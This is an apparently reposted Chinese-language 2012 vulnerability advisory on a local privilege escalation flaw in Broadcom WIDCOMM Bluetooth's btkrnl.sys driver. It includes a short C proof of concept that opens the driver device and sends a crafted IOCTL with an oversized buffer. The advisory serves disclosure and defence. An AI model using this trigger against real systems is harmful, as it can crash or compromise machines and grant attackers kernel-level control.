Broadcom WIDCOMM Bluetooth 'btkrnl.sys'驱动程序本地权限提升漏洞
发布日期:2012-10-18
更新日期:2012-10-22
受影响系统:Broadcom WIDCOMM 5.6.0.6950
Broadcom WIDCOMM
描述:
BUGTRAQ ID:
56124
Broadcom WIDCOMM Bluetooth可将蓝牙功能集成到移动电话、个人电脑、PDA、游戏控制器、汽车和工业设备。
Broadcom WIDCOMM Bluetooth 5.6.0.6950及其他版本存在安全漏洞,本地攻击者可利用此漏洞获取提升的权限并以内核权限执行任意代码。
<*来源:Nikita Tarakanov
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
HANDLE hDevice;
char *inbuff, *outbuff;
DWORD ioctl, len,;
if ( (hDevice = CreateFileA("\\\\.\\btkrnl",
0,
0,
0,
OPEN_EXISTING,
0,
NULL) ) != INVALID_HANDLE_VALUE )
{
printf("Device succesfully opened!\n");
}
else
{
printf("Error: Error opening device \n");
return 0;
}
inbuff = (char*)malloc(0x12000);
if(!inbuff){
printf("malloc failed!\n");
return 0;
}
outbuff = (char*)malloc(0x12000);
if(!outbuff){
printf("malloc failed!\n");
return 0;
}
ioctl = 0x2A04C0;
memset(inbuff, 0x41, 0x70);
DeviceIoControl(hDevice, ioctl, (LPVOID)inbuff, 0x70, (LPVOID)outbuff, 0x70, &len, NULL);
建议:
厂商补丁:
Broadcom
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.broadcom.com/products/brands/WIDCOMM浏览次数:2545
严重程度:0(网友投票)
